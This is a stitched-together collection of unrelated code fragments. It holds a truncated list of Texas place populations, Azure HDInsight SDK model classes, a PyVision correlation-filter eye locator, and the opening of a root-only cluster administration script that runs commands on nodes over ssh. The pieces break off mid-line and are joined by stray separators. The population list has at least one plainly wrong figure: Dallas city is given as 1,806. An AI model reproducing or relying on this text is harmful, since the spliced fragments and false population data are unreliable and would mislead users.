("Coleman city, Texas",4398),
("College Station city, Texas",110782),
("Colleyville city, Texas",26037),
("Collinsville town, Texas",1653),
("Colmesneil city, Texas",631),
("Colorado Acres CDP, Texas",118),
("Colorado City city, Texas",3983),
("Columbus city, Texas",3612),
("Comanche city, Texas",4194),
("Combes town, Texas",3031),
("Combine city, Texas",1832),
("Comfort CDP, Texas",3350),
("Commerce city, Texas",9000),
("Como town, Texas",797),
("Concepcion CDP, Texas",46),
("Conroe city, Texas",80893),
("Converse city, Texas",26246),
("Cool city, Texas",180),
("Coolidge town, Texas",846),
("Cooper city, Texas",2213),
("Coppell city, Texas",41512),
("Copperas Cove city, Texas",32731),
("Copper Canyon town, Texas",1235),
("Corinth city, Texas",21158),
("Corpus Christi city, Texas",324692),
("Corral City town, Texas",6),
("Corrigan town, Texas",1794),
("Corsicana city, Texas",23736),
("Cottonwood city, Texas",222),
("Cottonwood Shores city, Texas",1524),
("Cotulla city, Texas",4162),
("Country Acres CDP, Texas",223),
("Coupland city, Texas",255),
("Cove city, Texas",365),
("Covington city, Texas",255),
("Coyanosa CDP, Texas",209),
("Coyote Acres CDP, Texas",1297),
("Coyote Flats city, Texas",342),
("Crandall city, Texas",3491),
("Crane city, Texas",4051),
("Cranfills Gap city, Texas",368),
("Crawford town, Texas",732),
("Creedmoor city, Texas",185),
("Cresson city, Texas",864),
("Crockett city, Texas",6534),
("Crosby CDP, Texas",2542),
("Crosbyton city, Texas",1781),
("Cross Mountain CDP, Texas",3798),
("Cross Plains town, Texas",1101),
("Cross Roads town, Texas",1202),
("Cross Timber town, Texas",356),
("Crowell city, Texas",799),
("Crowley city, Texas",15189),
("Crystal City city, Texas",7381),
("Cuero city, Texas",8349),
("Cuevitas CDP, Texas",0),
("Cumby city, Texas",712),
("Cumings CDP, Texas",2420),
("Cuney town, Texas",46),
("Cushing city, Texas",527),
("Cut and Shoot city, Texas",1313),
("Daingerfield city, Texas",2777),
("Daisetta city, Texas",698),
("Dalhart city, Texas",8545),
("Dallas city, Texas",1806),
("Dalworthington Gardens city, Texas",2456),
("Damon CDP, Texas",269),
("Danbury city, Texas",1391),
("Darrouzett town, Texas",430),
("Dawson town, Texas",900),
("Dayton city, Texas",7881),
("Dayton Lakes city, Texas",108),
("Dean city, Texas",490),
("Decatur city, Texas",6608),
("DeCordova city, Texas",2860),
("Deer Park city, Texas",33935),
("De Kalb city, Texas",1700),
("De Leon city, Texas",2470),
("Dell City city, Texas",216),
("Del Mar Heights CDP, Texas",119),
("Delmita CDP, Texas",129),
("Del Rio city, Texas",35921),
("Del Sol CDP, Texas",59),
("Denison city, Texas",23820),
("Denton city, Texas",133661),
("Denver City town, Texas",4874),
("Deport city, Texas",669),
("DeSoto city, Texas",53030),
("Detroit town, Texas",921),
("Devers city, Texas",434),
("Devine city, Texas",4721),
("Deweyville CDP, Texas",637),
("D'Hanis CDP, Texas",918),
("Diboll city, Texas",5308),
("Dickens city, Texas",276),
("Dickinson city, Texas",20529),
("Dilley city, Texas",4318),
("Dimmitt city, Texas",4251),
("DISH town, Texas",419),
("Dodd City town, Texas",337),
("Dodson town, Texas",158),
("Doffing CDP, Texas",5065),
("Domino town, Texas",107),
("Donna city, Texas",16576),
("Doolittle CDP, Texas",3531),
("Dorchester city, Texas",77),
("Double Oak town, Texas",3065),
("Douglassville town, Texas",237),
("Driftwood CDP, Texas",74),
("Dripping Springs city, Texas",3277),
("Driscoll city, Texas",612),
("Dublin city, Texas",3589),
("Dumas city, Texas",14597),
("Duncanville city, Texas",39630),
("Eagle Lake city, Texas",3685),
("Eagle Pass city, Texas",29151),
("Early city, Texas",2923),
("Earth city, Texas",1099),
("East Alto Bonito CDP, Texas",819),
("East Bernard city, Texas",2668),
("Eastland city, Texas",3893),
("East Mountain city, Texas",1311),
("Easton city, Texas",373),
("East Tawakoni city, Texas",729),
("Ector city, Texas",903),
("Edcouch city, Texas",3316),
("Eden city, Texas",2511),
("Edgecliff Village town, Texas",3002),
("Edgewater Estates CDP, Texas",122),
("Edgewood town, Texas",1876),
("Edinburg city, Texas",94019),
("Edmonson town, Texas",76),
("Edna city, Texas",5784),
("Edom city, Texas",245),
("Edroy CDP, Texas",523),
("Eidson Road CDP, Texas",9531),
("Elbert CDP, Texas",8),
("El Brazil CDP, Texas",61),
("El Camino Angosto CDP, Texas",173),
("El Campo city, Texas",11670),
("El Castillo CDP, Texas",137),
("El Cenizo CDP, Texas",444),
("El Cenizo city, Texas",3248),
("El Chaparral CDP, Texas",375),
("Eldorado city, Texas",2348),
("Electra city, Texas",2721),
("Elgin city, Texas",9616),
("Elias-Fela Solis CDP, Texas",8),
("El Indio CDP, Texas",23),
("Elkhart town, Texas",1399),
("El Lago city, Texas",2760),
("Elm Creek CDP, Texas",2730),
("Elmendorf city, Texas",2077),
("El Mesquite CDP, Texas",0),
("Elmo CDP, Texas",1351),
("E. Lopez CDP, Texas",210),
("El Paso city, Texas",680354),
("El Quiote CDP, Texas",193),
("El Rancho Vela CDP, Texas",569),
("El Refugio CDP, Texas",372),
("Elsa city, Texas",7142),
("El Socio CDP, Texas",69),
("Emerald Bay CDP, Texas",1307),
("Emhouse town, Texas",162),
("Emory city, Texas",1361),
("Encantada-Ranchito-El Calaboz CDP, Texas",1438),
("Enchanted Oaks town, Texas",316),
("Encinal city, Texas",953),
("Encino CDP, Texas",44),
("Ennis city, Texas",19196),
("Escobares city, Texas",2529),
("Estelline town, Texas",100),
("Eugenio Saenz CDP, Texas",260),
("Euless city, Texas",55047),
("Eureka city, Texas",342),
("Eustace city, Texas",912),
("Evadale CDP, Texas",1887),
("Evant town, Texas",493),
("Evergreen CDP, Texas",53),
("Everman city, Texas",6252),
("Fabens CDP, Texas",5946),
("Fabrica CDP, Texas",748),
("Fairchilds village, Texas",854),
("Fairfield city, Texas",2922),
("Fair Oaks Ranch city, Texas",10857),
("Fairview town, Texas",8665),
("Falconaire CDP, Texas",180),
("Falcon Heights CDP, Texas",22),
("Falcon Lake Estates CDP, Texas",995),
("Falcon Mesa CDP, Texas",248),
("Falcon Village CDP, Texas",0),
("Falfurrias city, Texas",4644),
("Falls City city, Texas",935),
("Falman CDP, Texas",15),
("Fannett CDP, Texas",2156),
("Farmers Branch city, Texas",35552),
("Farmersville city, Texas",3469),
("Farwell city, Texas",1388),
("Fate city, Texas",11705),
("Fayetteville city, Texas",204),
("Faysville CDP, Texas",0),
("<NAME> CDP, Texas",27),
("Ferris city, Texas",2612),
("Fifth Street CDP, Texas",2047),
("Flatonia town, Texas",1556),
("Flor del Rio CDP, Texas",254),
("Florence city, Texas",981),
("Floresville city, Texas",7377),
("Flowella CDP, Texas",21),
("Flower Mound town, Texas",73252),
("Floydada city, Texas",2767),
("Follett city, Texas",479),
("Forest Hill city, Texas",12913),
("Forney city, Texas",19366),
("Forsan city, Texas",224),
("Fort Bliss CDP, Texas",10602),
("Fort Clark Springs CDP, Texas",1189),
("Fort Davis CDP, Texas",1029),
("Fort Hancock CDP, Texas",1898),
("Fort Hood CDP, Texas",25365),
("Fort Stockton city, Texas",8414),
("Fort Worth city, Texas",855786),
("Four Corners CDP, Texas",12465),
("Four Points CDP, Texas",0),
("Fowlerton CDP, Texas",314),
("Franklin city, Texas",1976),
("Frankston town, Texas",1053),
("Fredericksburg city, Texas",11157),
("Freeport city, Texas",12098),
("Freer city, Texas",2714),
("Fresno CDP, Texas",24607),
("Friendswood city, Texas",39319),
("Friona city, Texas",3936),
("Frisco city, Texas",165700),
("Fritch city, Texas",2503),
("Fronton CDP, Texas",260),
("Fronton Ranchettes CDP, Texas",234),
("Frost city, Texas",755),
("Fruitvale city, Texas",479),
("Fulshear city, Texas",8014),
("Fulton town, Texas",1451),
("Gail CDP, Texas",245),
("Gainesville city, Texas",16275),
("Galena Park city, Texas",11075),
("Gallatin city, Texas",334),
("Galveston city, Texas",50039),
("Ganado city, Texas",2056),
("Garceno CDP, Texas",480),
("Garciasville CDP, Texas",72),
("Garden City CDP, Texas",487),
("Gardendale CDP, Texas",2031),
("Garden Ridge city, Texas",3887),
("Garfield CDP, Texas",1533),
("Garland city, Texas",237982),
("Garrett town, Texas",1062),
("Garrison city, Texas",1243),
("Gary City town, Texas",397),
("Garza-Salinas II CDP, Texas",570),
("Gatesville city, Texas",12387),
("Georgetown city, Texas",66804),
("George West | |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
from msrest.exceptions import HttpOperationError
class Resource(Model):
"""The core properties of ARM resources.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Fully qualified resource Id for the resource.
:vartype id: str
:ivar name: The name of the resource
:vartype name: str
:ivar type: The type of the resource.
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, **kwargs):
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
class ProxyResource(Resource):
"""The resource model definition for a ARM proxy resource. It will have
everything other than required location and tags.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Fully qualified resource Id for the resource.
:vartype id: str
:ivar name: The name of the resource
:vartype name: str
:ivar type: The type of the resource.
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ProxyResource, self).__init__(**kwargs)
class Application(ProxyResource):
"""The HDInsight cluster application.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Fully qualified resource Id for the resource.
:vartype id: str
:ivar name: The name of the resource
:vartype name: str
:ivar type: The type of the resource.
:vartype type: str
:param etag: The ETag for the application
:type etag: str
:param tags: The tags for the application.
:type tags: dict[str, str]
:param properties: The properties of the application.
:type properties: ~azure.mgmt.hdinsight.models.ApplicationProperties
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'properties': {'key': 'properties', 'type': 'ApplicationProperties'},
}
def __init__(self, **kwargs):
super(Application, self).__init__(**kwargs)
self.etag = kwargs.get('etag', None)
self.tags = kwargs.get('tags', None)
self.properties = kwargs.get('properties', None)
class ApplicationGetEndpoint(Model):
"""Gets the application SSH endpoint.
:param location: The location of the endpoint.
:type location: str
:param destination_port: The destination port to connect to.
:type destination_port: int
:param public_port: The public port to connect to.
:type public_port: int
"""
_attribute_map = {
'location': {'key': 'location', 'type': 'str'},
'destination_port': {'key': 'destinationPort', 'type': 'int'},
'public_port': {'key': 'publicPort', 'type': 'int'},
}
def __init__(self, **kwargs):
super(ApplicationGetEndpoint, self).__init__(**kwargs)
self.location = kwargs.get('location', None)
self.destination_port = kwargs.get('destination_port', None)
self.public_port = kwargs.get('public_port', None)
class ApplicationGetHttpsEndpoint(Model):
"""Gets the application HTTP endpoints.
:param access_modes: The list of access modes for the application.
:type access_modes: list[str]
:param location: The location of the endpoint.
:type location: str
:param destination_port: The destination port to connect to.
:type destination_port: int
:param public_port: The public port to connect to.
:type public_port: int
:param sub_domain_suffix: The subdomain suffix of the application.
:type sub_domain_suffix: str
:param disable_gateway_auth: The value indicates whether to disable
GatewayAuth.
:type disable_gateway_auth: bool
"""
_attribute_map = {
'access_modes': {'key': 'accessModes', 'type': '[str]'},
'location': {'key': 'location', 'type': 'str'},
'destination_port': {'key': 'destinationPort', 'type': 'int'},
'public_port': {'key': 'publicPort', 'type': 'int'},
'sub_domain_suffix': {'key': 'subDomainSuffix', 'type': 'str'},
'disable_gateway_auth': {'key': 'disableGatewayAuth', 'type': 'bool'},
}
def __init__(self, **kwargs):
super(ApplicationGetHttpsEndpoint, self).__init__(**kwargs)
self.access_modes = kwargs.get('access_modes', None)
self.location = kwargs.get('location', None)
self.destination_port = kwargs.get('destination_port', None)
self.public_port = kwargs.get('public_port', None)
self.sub_domain_suffix = kwargs.get('sub_domain_suffix', None)
self.disable_gateway_auth = kwargs.get('disable_gateway_auth', None)
class ApplicationProperties(Model):
"""The HDInsight cluster application GET response.
Variables are only populated by the server, and will be ignored when
sending a request.
:param compute_profile: The list of roles in the cluster.
:type compute_profile: ~azure.mgmt.hdinsight.models.ComputeProfile
:param install_script_actions: The list of install script actions.
:type install_script_actions:
list[~azure.mgmt.hdinsight.models.RuntimeScriptAction]
:param uninstall_script_actions: The list of uninstall script actions.
:type uninstall_script_actions:
list[~azure.mgmt.hdinsight.models.RuntimeScriptAction]
:param https_endpoints: The list of application HTTPS endpoints.
:type https_endpoints:
list[~azure.mgmt.hdinsight.models.ApplicationGetHttpsEndpoint]
:param ssh_endpoints: The list of application SSH endpoints.
:type ssh_endpoints:
list[~azure.mgmt.hdinsight.models.ApplicationGetEndpoint]
:ivar provisioning_state: The provisioning state of the application.
:vartype provisioning_state: str
:param application_type: The application type.
:type application_type: str
:ivar application_state: The application state.
:vartype application_state: str
:param errors: The list of errors.
:type errors: list[~azure.mgmt.hdinsight.models.Errors]
:ivar created_date: The application create date time.
:vartype created_date: str
:ivar marketplace_identifier: The marketplace identifier.
:vartype marketplace_identifier: str
"""
_validation = {
'provisioning_state': {'readonly': True},
'application_state': {'readonly': True},
'created_date': {'readonly': True},
'marketplace_identifier': {'readonly': True},
}
_attribute_map = {
'compute_profile': {'key': 'computeProfile', 'type': 'ComputeProfile'},
'install_script_actions': {'key': 'installScriptActions', 'type': '[RuntimeScriptAction]'},
'uninstall_script_actions': {'key': 'uninstallScriptActions', 'type': '[RuntimeScriptAction]'},
'https_endpoints': {'key': 'httpsEndpoints', 'type': '[ApplicationGetHttpsEndpoint]'},
'ssh_endpoints': {'key': 'sshEndpoints', 'type': '[ApplicationGetEndpoint]'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'application_type': {'key': 'applicationType', 'type': 'str'},
'application_state': {'key': 'applicationState', 'type': 'str'},
'errors': {'key': 'errors', 'type': '[Errors]'},
'created_date': {'key': 'createdDate', 'type': 'str'},
'marketplace_identifier': {'key': 'marketplaceIdentifier', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationProperties, self).__init__(**kwargs)
self.compute_profile = kwargs.get('compute_profile', None)
self.install_script_actions = kwargs.get('install_script_actions', None)
self.uninstall_script_actions = kwargs.get('uninstall_script_actions', None)
self.https_endpoints = kwargs.get('https_endpoints', None)
self.ssh_endpoints = kwargs.get('ssh_endpoints', None)
self.provisioning_state = None
self.application_type = kwargs.get('application_type', None)
self.application_state = None
self.errors = kwargs.get('errors', None)
self.created_date = None
self.marketplace_identifier = None
class Autoscale(Model):
"""The autoscale request parameters.
:param capacity: Parameters for load-based autoscale
:type capacity: ~azure.mgmt.hdinsight.models.AutoscaleCapacity
:param recurrence: Parameters for schedule-based autoscale
:type recurrence: ~azure.mgmt.hdinsight.models.AutoscaleRecurrence
"""
_attribute_map = {
'capacity': {'key': 'capacity', 'type': 'AutoscaleCapacity'},
'recurrence': {'key': 'recurrence', 'type': 'AutoscaleRecurrence'},
}
def __init__(self, **kwargs):
super(Autoscale, self).__init__(**kwargs)
self.capacity = kwargs.get('capacity', None)
self.recurrence = kwargs.get('recurrence', None)
class AutoscaleCapacity(Model):
"""The load-based autoscale request parameters.
:param min_instance_count: The minimum instance count of the cluster
:type min_instance_count: int
:param max_instance_count: The maximum instance count of the cluster
:type max_instance_count: int
"""
_attribute_map = {
'min_instance_count': {'key': 'minInstanceCount', 'type': 'int'},
'max_instance_count': {'key': 'maxInstanceCount', 'type': 'int'},
}
def __init__(self, **kwargs):
super(AutoscaleCapacity, self).__init__(**kwargs)
self.min_instance_count = kwargs.get('min_instance_count', None)
self.max_instance_count = kwargs.get('max_instance_count', None)
class AutoscaleRecurrence(Model):
"""Schedule-based autoscale request parameters.
:param time_zone: The time zone for the autoscale schedule times
:type time_zone: str
:param schedule: Array of schedule-based autoscale rules
:type schedule: list[~azure.mgmt.hdinsight.models.AutoscaleSchedule]
"""
_attribute_map = {
'time_zone': {'key': 'timeZone', 'type': 'str'},
'schedule': {'key': 'schedule', 'type': '[AutoscaleSchedule]'},
}
def __init__(self, **kwargs):
super(AutoscaleRecurrence, self).__init__(**kwargs)
self.time_zone = kwargs.get('time_zone', None)
self.schedule = kwargs.get('schedule', None)
class AutoscaleSchedule(Model):
"""Parameters for a schedule-based autoscale rule, consisting of an array of
days + a time and capacity.
:param days: Days of the week for a schedule-based autoscale rule
:type days: list[str or ~azure.mgmt.hdinsight.models.DaysOfWeek]
:param time_and_capacity: Time and capacity for a schedule-based autoscale
rule
:type time_and_capacity:
~azure.mgmt.hdinsight.models.AutoscaleTimeAndCapacity
"""
_attribute_map = {
'days': {'key': 'days', 'type': '[DaysOfWeek]'},
'time_and_capacity': {'key': 'timeAndCapacity', 'type': 'AutoscaleTimeAndCapacity'},
}
def __init__(self, **kwargs):
super(AutoscaleSchedule, self).__init__(**kwargs)
self.days = kwargs.get('days', None)
self.time_and_capacity = kwargs.get('time_and_capacity', None)
class AutoscaleTimeAndCapacity(Model):
"""Time and capacity request parameters.
:param time: 24-hour time in the form xx:xx
:type time: str
:param min_instance_count: The minimum instance count of the cluster
:type min_instance_count: int
:param max_instance_count: The maximum instance count of the cluster
:type max_instance_count: int
"""
_attribute_map = {
'time': {'key': 'time', 'type': 'str'},
'min_instance_count': {'key': 'minInstanceCount', 'type': 'int'},
'max_instance_count': {'key': 'maxInstanceCount', 'type': 'int'},
}
def __init__(self, **kwargs):
super(AutoscaleTimeAndCapacity, self).__init__(**kwargs)
self.time = kwargs.get('time', None)
self.min_instance_count = kwargs.get('min_instance_count', None)
self.max_instance_count = kwargs.get('max_instance_count', None)
class BillingMeters(Model):
"""The billing meters.
:param meter_parameter: The virtual machine sizes.
:type meter_parameter: str
:param meter: The HDInsight meter guid.
:type meter: str
:param unit: The unit of meter, VMHours or CoreHours.
:type unit: str
"""
_attribute_map = {
'meter_parameter': {'key': 'meterParameter', 'type': 'str'},
'meter': {'key': 'meter', 'type': 'str'},
'unit': {'key': 'unit', 'type': 'str'},
}
def __init__(self, **kwargs):
super(BillingMeters, self).__init__(**kwargs)
self.meter_parameter = kwargs.get('meter_parameter', None)
self.meter = kwargs.get('meter', None)
self.unit = kwargs.get('unit', None)
class BillingResources(Model):
"""The billing resources.
:param region: The region or location.
:type region: str
:param billing_meters: The billing meter | |
# PyVision License
#
# Copyright (c) 2006-2008 <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither name of copyright holders nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
This is a simplified correlation filter implementation used to locate eyes
using ASEF correlation filters. This file contains two classes:
OpenCVFilterEyeLocator and FilterEyeLocator. The first is the bare minimum
required to locate eye and only requires opencv. The second need is a wrapper
that includes a nice pyvision compatible interface. This class is not integrated with
PyVision. PyVision supplies an interface to this class which cleans
up the interface and provides a bridge to many of the PyVision data
structures.
'''
import cv
import math
import struct
import array
import os.path
import pyvision as pv
import numpy as np
import sys
__author__ = "<NAME> - Colorado State Univeristy"
__version__ = "$Revision: 729 $"
if pv.WARN_COMMERCIAL_USE:
warning = '''
WARNING: A patent protection is anticipated for ASEF and
similar filters by the Colorado State University
Research Foundation (CSURF).
This module, "FilterEyeLocator.py", my not be
suitable for commercial use.
Commercial and government users should contact
CSURF for additional details:
http://www.csurf.org/tto/pdfs/ncs_forms/09-017_csurf_ncs.pdf
'''
sys.stderr.write(warning)
#TODO: Unknown error - This may be related version 1.0.0 of opencv
#Traceback (most recent call last):
# File "/home/dbolme/ASEFFilters/python/csu/tools/face_scan.py", line 117, in ?
# results = processFaces(im,face_detect,locate_eyes)
# File "/home/dbolme/ASEFFilters/python/csu/tools/face_scan.py", line 57, in processFaces
# eye1, eye2, corr1, corr2 = locate_eyes.locateEyes(cv_im)
# File "/home/dbolme/ASEFFilters/python/csu/face/FilterEyeLocator.py", line 185, in locateEyes
# leye = cv.cvMinMaxLoc(self.left_roi)[3]
#IndexError: list index out of range
#TODO: Add a quality estimate
def saveFilterEyeLocator(filename, el, comment="",copyright=""):
'''
File Format
- Line 1: CFEL
- Line 2: <comment>
- Line 3: <copyright>
- Line 4: ROWS COLS
- Line 5: LEFT_RECT
- Line 6: RIGHT_RECT
- Line 7: BYTE_ORDER(0x41424344 or 'ABCD')
- Line 8: <binary data: two single precision floating point arrays of 4*WIDTH*HEIGHT bytes)
'''
r,c = el.left_filter.rows,el.left_filter.cols
f = open(filename,'wb')
f.write("CFEL\n")
f.write(comment.strip()+"\n")
f.write(copyright.strip()+"\n")
f.write("%d %d\n"%(r,c))
f.write("%d %d %d %d\n"%(el.left_rect.x,el.left_rect.y,el.left_rect.width,el.left_rect.height))
f.write("%d %d %d %d\n"%(el.right_rect.x,el.right_rect.y,el.right_rect.width,el.right_rect.height))
f.write("%s\n"%struct.pack("i",0x41424344))
assert len(el.left_filter.imageData) == 4*r*c
f.write(el.left_filter.imageData)
assert len(el.right_filter.imageData) == 4*r*c
f.write(el.right_filter.imageData)
def loadFilterEyeLocator(filename,ilog=None):
'''
Loads the eye locator from a file.'
'''
# open the file
f = open(filename,'rb')
# Check the first line
line = f.readline().strip()
assert line == "CFEL"
# read past the comment and copyright.
f.readline()
f.readline()
# get the width and the height
r,c = f.readline().split()
r,c = int(r),int(c)
# read in the left bounding rectangle
x,y,w,h = f.readline().split()
left_rect = (int(x),int(y),int(w),int(h))
# read in the right bounding rectangle
x,y,w,h = f.readline().split()
right_rect = (int(x),int(y),int(w),int(h))
# read the magic number
magic_number = f.readline().strip()
assert len(magic_number) == 4
magic_number = struct.unpack('i',magic_number)[0]
# Read in the filter data
lf = array.array('f')
rf = array.array('f')
lf.fromfile(f,r*c)
rf.fromfile(f,r*c)
# Test the magic number and byteswap if necessary.
if magic_number == 0x41424344:
pass
elif magic_number == 0x44434241:
lf.byteswap()
rf.byteswap()
else:
raise ValueError("Bad Magic Number: Unknown byte ordering in file")
# Create the left and right filters
left_filter = cv.CreateMat(r,c,cv.CV_32F)
right_filter = cv.CreateMat(r,c,cv.CV_32F)
# Copy data into the left and right filters
cv.SetData(left_filter, lf.tostring())
cv.SetData(right_filter, rf.tostring())
tmp = pv.OpenCVToNumpy(left_filter)
t1 = tmp.mean()
t2 = tmp.std()
cv.Scale(left_filter,left_filter,1.0/t2,-t1*1.0/t2)
tmp = pv.OpenCVToNumpy(right_filter)
t1 = tmp.mean()
t2 = tmp.std()
cv.Scale(right_filter,right_filter,1.0/t2,-t1*1.0/t2)
#tmp = pv.OpenCVToNumpy(left_filter)
#print tmp.mean(),tmp.std()
if ilog != None:
#lf = cv.cvCreateMat(r,c,cv.CV_8U)
#rf = cv.cvCreateMat(r,c,cv.CV_8U)
lf = pv.OpenCVToNumpy(left_filter)
rf = pv.OpenCVToNumpy(right_filter)
lf = np.fft.fftshift(lf).transpose()
rf = np.fft.fftshift(rf).transpose()
ilog.log(pv.Image(lf),label="LeftEyeFilter")
ilog.log(pv.Image(rf),label="RightEyeFilter")
# Return the eye locator
return OpenCVFilterEyeLocator(left_filter,right_filter,left_rect,right_rect)
class OpenCVFilterEyeLocator:
'''
This class is used for someone only interested in locating the eyes in an
image using correlation filters. This class does not include any support
for training correlation filters. For training see ASEF. This class
is written only using OpenCV and is much faster than the ASEF class.
For details see the paper:
<NAME>, <NAME>, and <NAME>. Average of
Synthetic Exact Filters. Submitted to Computer Vision and Pattern
Recoginition. 2009.
The class uses two ASEF filters to find the eyes. The eyes are located by
first computing the correlation of the face tile with each filter. The
max value from the correlation plain is returned as the eye coordinate.
Also returned is the full correlation output from the image.
The images are normalized by computing log transforming the pixel values
To improve performance, this class is not thread safe. The class reuses
data arrays allocated for each call to use this class for multiple threads
you should create an instance for each threads. Also note that each method
call may overwrite arrays returned by this application. So if you need
the returned data to persist be sure to create a copy.
- Left and right eyes are in relation to the location in the image.
'''
def __init__(self,left_filter,right_filter, left_rect, right_rect):
'''
@param left_filter: is in the Fourier domain where the left eye
corresponds to the real output and the right eye corresponds to
the imaginary output
'''
# Check the input to this function
r,c = left_filter.rows,left_filter.cols
assert left_filter.width == right_filter.width
assert left_filter.height == right_filter.height
assert left_filter.channels == 1
assert right_filter.channels == 1
# Create the arrays needed for the computation
self.left_filter = cv.CreateMat(r,c,cv.CV_32F)
self.right_filter = cv.CreateMat(r,c,cv.CV_32F)
self.left_filter_dft = cv.CreateMat(r,c,cv.CV_32F)
self.right_filter_dft = cv.CreateMat(r,c,cv.CV_32F)
self.image = cv.CreateMat(r,c,cv.CV_32F)
self.left_corr = cv.CreateMat(r,c,cv.CV_32F)
self.right_corr = cv.CreateMat(r,c,cv.CV_32F)
# Populate the spatial filters
cv.ConvertScale(left_filter, self.left_filter)
cv.ConvertScale(right_filter, self.right_filter)
# Compute the filters in the Fourier domain
cv.DFT(self.left_filter, self.left_filter_dft, cv.CV_DXT_FORWARD)
cv.DFT(self.right_filter, self.right_filter_dft, cv.CV_DXT_FORWARD)
# Set up correlation region of interest
self.left_rect = left_rect
self.right_rect = right_rect
self.left_roi = cv.GetSubRect(self.left_corr,self.left_rect)
self.right_roi = cv.GetSubRect(self.right_corr,self.right_rect)
# Create the look up table for the log transform
self.lut = cv.CreateMat(256,1,cv.CV_32F)
for i in range(256):
self.lut[i,0] = math.log(i+1)
def locateEyes(self,image_tile):
'''
@param image_tile: is an 32-bit gray scale opencv image tile of a face
that is the same size as the filter
@type image_tile: 8-bit gray scale opencv image
@returns: a tuple consisting of the location of the left and right eyes
(opencv 2D points), and the complex correlation plain output
@raises AssertionError: is raised if the image is not 8-bit or not the
same size as the filter
'''
self.correlate(image_tile)
leye = cv.MinMaxLoc(self.left_roi)[3]
leye = (self.left_rect[0]+leye[0],self.left_rect[1]+leye[1])
reye = cv.MinMaxLoc(self.right_roi)[3]
reye = (self.right_rect[0]+reye[0],self.right_rect[1]+reye[1])
return leye,reye,self.left_corr,self.right_corr
def _preprocess(self,image_tile):
'''
preprocess an image tile.
'''
# TODO: This function has problems in opencv 2.2. There appears to be a bug.
image_tile = pv.OpenCVToNumpy(image_tile)
self.image = pv.NumpyToOpenCV(np.log(image_tile + 1.0).astype(np.float32))
return self.image
def correlate(self,image_tile):
'''
Correlate the image with the left and | |
#!/usr/bin/python3
import subprocess, sys, os, time, getpass
# Make sure the script is being run as root
whoami = getpass.getuser()
if whoami != 'root':
print('This script must be run as root')
sys.exit()
# Should be resolvable via hosts file
HEAD_NODE = "yourhostname"
# Directory where you archive old users home dirs: NO TRAILING SLASH
archivedir = "/home/archive"
# Min/Max UID & GID's
GID_MIN = 2000
GID_MAX = 4000
UID_MIN = 2000
UID_MAX = 3000
PROJECT_GID_MIN = 3000
# Interface that nodes use for external connection.
# I leave these turned off unless needed. This script will bring up/take down external interfaces
EXTERNAL_INTERFACE = "ethX"
# The menu
menu = """
Welcome to the Grid Management Tool
This script helps you perform some common tasks on the nodes via ssh remote execute.
What would you like to do?
1. Update/Upgrade Nodes
2. Install a package from apt on Nodes
3. Execute an R Script on Nodes(The script must specify a CRAN mirror)
4. Add a system user to all nodes (including head node)
5. Completely Remove a System User
6. Add a group
7. Remove a group
8. Add existing user to a supplementary group
9. Execute an arbitrary command on all nodes
10. Restart Ganglia Monitor on all nodes
11. Reboot the Nodes
0. Quit.
"""
# Execute a command on each node
def execute(command):
for node in nodes:
print("Executing '%s' on %s" % (command, node))
ip = subprocess.check_output(["getent hosts %s | cut -d' ' -f1" % node], shell=True).decode('ascii').strip()
proc = subprocess.Popen(["ssh", "%s" % ip, command], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
print("Failed to execute on %s \nERROR\n%s" % (node, err))
def execute_arb(command):
for node in nodes:
print("Executing '%s' on %s" % (command, node))
